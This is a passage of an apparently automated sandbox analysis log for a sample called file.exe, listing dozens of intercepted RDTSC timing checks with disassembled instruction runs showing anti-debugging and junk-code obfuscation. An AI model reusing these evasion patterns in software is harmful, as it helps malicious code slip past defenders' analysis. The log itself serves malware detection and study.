                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1020D72 second address: 1020D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1020ECA second address: 1020EE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F72FCC0D459h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10211F0 second address: 10211F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10211F6 second address: 102120E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72FCC0D454h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102120E second address: 1021230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F72FCF2ACDCh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1021230 second address: 1021241 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnl 00007F72FCC0D446h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102139D second address: 10213A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F72FCF2ACC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10213A9 second address: 10213AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10213AD second address: 10213B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10213B1 second address: 10213B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1025198 second address: 102519C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102519C second address: 10251BA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F72FCC0D454h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10251BA second address: 10251E9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F72FCF2ACCDh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c sub esi, dword ptr [ebp+122D1C44h] 0x00000012 push 00000000h 0x00000014 call 00007F72FCF2ACC9h 0x00000019 push eax 0x0000001a push edx 0x0000001b push ebx 0x0000001c jg 00007F72FCF2ACC6h 0x00000022 pop ebx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10251E9 second address: 10251F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F72FCC0D446h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10251F3 second address: 10251F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1025353 second address: 1025359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1025359 second address: 1025376 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F72FCF2ACD2h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1025376 second address: 10253F2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F72FCC0D448h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b pushad 0x0000000c mov eax, dword ptr [ebp+122D38D6h] 0x00000012 jmp 00007F72FCC0D44Ah 0x00000017 popad 0x00000018 jp 00007F72FCC0D457h 0x0000001e push 00000000h 0x00000020 mov edi, dword ptr [ebp+122D39EEh] 0x00000026 call 00007F72FCC0D449h 0x0000002b push eax 0x0000002c jmp 00007F72FCC0D454h 0x00000031 pop eax 0x00000032 push eax 0x00000033 pushad 0x00000034 jne 00007F72FCC0D448h 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F72FCC0D453h 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10253F2 second address: 102544D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F72FCF2ACC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jnp 00007F72FCF2ACD5h 0x00000015 jmp 00007F72FCF2ACCFh 0x0000001a mov eax, dword ptr [eax] 0x0000001c jne 00007F72FCF2ACDBh 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F72FCF2ACD4h 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102544D second address: 10254F0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F72FCC0D44Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b jc 00007F72FCC0D44Bh 0x00000011 mov edi, 6B9D3249h 0x00000016 push 00000003h 0x00000018 mov ecx, dword ptr [ebp+122D38F2h] 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebp 0x00000023 call 00007F72FCC0D448h 0x00000028 pop ebp 0x00000029 mov dword ptr [esp+04h], ebp 0x0000002d add dword ptr [esp+04h], 0000001Ch 0x00000035 inc ebp 0x00000036 push ebp 0x00000037 ret 0x00000038 pop ebp 0x00000039 ret 0x0000003a call 00007F72FCC0D44Dh 0x0000003f and di, 3986h 0x00000044 pop esi 0x00000045 adc dl, 00000037h 0x00000048 push 00000003h 0x0000004a mov di, si 0x0000004d mov edi, dword ptr [ebp+122D375Eh] 0x00000053 push 96A57100h 0x00000058 push ecx 0x00000059 push esi 0x0000005a pushad 0x0000005b popad 0x0000005c pop esi 0x0000005d pop ecx 0x0000005e xor dword ptr [esp], 56A57100h 0x00000065 mov si, di 0x00000068 lea ebx, dword ptr [ebp+1245703Ch] 0x0000006e xor dword ptr [ebp+122D2C2Ch], eax 0x00000074 xchg eax, ebx 0x00000075 push eax 0x00000076 push edx 0x00000077 jmp 00007F72FCC0D454h 0x0000007c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10254F0 second address: 10254F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1025597 second address: 102559F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102559F second address: 1025625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 xor dword ptr [esp], 5DA6E96Ah 0x0000000f or dword ptr [ebp+122D2F2Ah], esi 0x00000015 push 00000003h 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007F72FCD84E88h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 00000016h 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 sbb edx, 3578036Ch 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ebx 0x0000003c call 00007F72FCD84E88h 0x00000041 pop ebx 0x00000042 mov dword ptr [esp+04h], ebx 0x00000046 add dword ptr [esp+04h], 00000016h 0x0000004e inc ebx 0x0000004f push ebx 0x00000050 ret 0x00000051 pop ebx 0x00000052 ret 0x00000053 push 00000003h 0x00000055 or dword ptr [ebp+122D301Bh], eax 0x0000005b push 9DD78600h 0x00000060 pushad 0x00000061 jmp 00007F72FCD84E95h 0x00000066 push eax 0x00000067 push edx 0x00000068 je 00007F72FCD84E86h 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1044F5A second address: 1044F67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F72FCF40426h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1042FAD second address: 1042FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F72FCD84E86h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F72FCD84E86h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104340D second address: 1043411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1043411 second address: 1043417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1043417 second address: 1043449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F72FCF40436h 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 jmp 00007F72FCF4042Eh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1043449 second address: 104344F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1043B47 second address: 1043B4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1038865 second address: 10388A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jno 00007F72FCD84E86h 0x0000000c jmp 00007F72FCD84E92h 0x00000011 jmp 00007F72FCD84E8Ch 0x00000016 popad 0x00000017 pushad 0x00000018 jmp 00007F72FCD84E8Dh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10440C4 second address: 10440CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10440CD second address: 10440D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10440D1 second address: 10440DF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10440DF second address: 10440E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10440E3 second address: 1044105 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F72FCF40426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F72FCF40434h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1044105 second address: 1044142 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F72FCD84E86h 0x00000008 jmp 00007F72FCD84E98h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F72FCD84E99h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1044142 second address: 1044146 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10446D8 second address: 10446EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F72FCD84E8Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1044DD7 second address: 1044DF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007F72FCF40432h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1044DF1 second address: 1044E06 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d jno 00007F72FCD84E86h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1044E06 second address: 1044E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104A656 second address: 104A65C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10494D5 second address: 10494DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10494DA second address: 1049502 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72FCD84E98h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jc 00007F72FCD84E86h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1049502 second address: 1049507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1049C8D second address: 1049C92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104AD4E second address: 104AD52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104AD52 second address: 104AD60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F72FCD84E8Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104AD60 second address: 104AD8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 jmp 00007F72FCF40432h 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 popad 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jng 00007F72FCF40426h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104AD8C second address: 104AD92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104AF51 second address: 104AF57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104FB1A second address: 104FB4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72FCD84E8Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F72FCD84E9Dh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104FB4C second address: 104FB72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 je 00007F72FCF40426h 0x00000009 jnc 00007F72FCF40426h 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F72FCF40433h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104FCC7 second address: 104FCCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104FCCD second address: 104FCEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F72FCF40438h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104FCEC second address: 104FD0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72FCD84E8Ch 0x00000007 jmp 00007F72FCD84E90h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104FFF2 second address: 104FFFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F72FCF40426h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105197F second address: 1051984 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1051984 second address: 10519AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F72FCF40434h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push esi 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10519AA second address: 10519BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10519BA second address: 10519D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F72FCF40436h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10519D4 second address: 10519D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10519D8 second address: 1051A91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jg 00007F72FCF40443h 0x00000012 pop eax 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F72FCF40428h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000016h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D311Ch], edi 0x00000033 jmp 00007F72FCF40436h 0x00000038 call 00007F72FCF40429h 0x0000003d jnp 00007F72FCF4043Eh 0x00000043 jmp 00007F72FCF40438h 0x00000048 push eax 0x00000049 push ecx 0x0000004a pushad 0x0000004b jmp 00007F72FCF40430h 0x00000050 jns 00007F72FCF40426h 0x00000056 popad 0x00000057 pop ecx 0x00000058 mov eax, dword ptr [esp+04h] 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f jns 00007F72FCF40426h 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105221D second address: 1052238 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72FCD84E94h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10527AB second address: 10527C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72FCF40434h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10527C3 second address: 1052810 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 js 00007F72FCD84E86h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jc 00007F72FCD84E99h 0x00000013 jmp 00007F72FCD84E93h 0x00000018 xchg eax, ebx 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007F72FCD84E88h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 nop 0x00000034 push esi 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052810 second address: 1052837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F72FCF40430h 0x00000009 popad 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jp 00007F72FCF40426h 0x00000015 jl 00007F72FCF40426h 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052A34 second address: 1052A38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052C27 second address: 1052C2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1054BC1 second address: 1054BE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72FCD84E8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F72FCD84E8Ch 0x0000000f jns 00007F72FCD84E86h 0x00000015 pop eax 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1053B12 second address: 1053B16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1053B16 second address: 1053B1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1055259 second address: 1055263 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F72FCF40426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1053B1A second address: 1053B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1055263 second address: 1055292 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72FCF4042Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F72FCF40437h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1055292 second address: 1055296 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105611E second address: 1056124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1055986 second address: 105598A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1056124 second address: 105617A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F72FCF40428h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 call 00007F72FCF4042Ah 0x00000027 mov dword ptr [ebp+122D29D7h], edi 0x0000002d pop esi 0x0000002e push 00000000h 0x00000030 mov edi, 75472E60h 0x00000035 push 00000000h 0x00000037 mov dword ptr [ebp+122D2F5Eh], eax 0x0000003d mov esi, dword ptr [ebp+122D2F39h] 0x00000043 push eax 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 jne 00007F72FCF40426h 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105598A second address: 1055990 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105617A second address: 105617E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105617E second address: 105618D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007F72FCD84E86h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
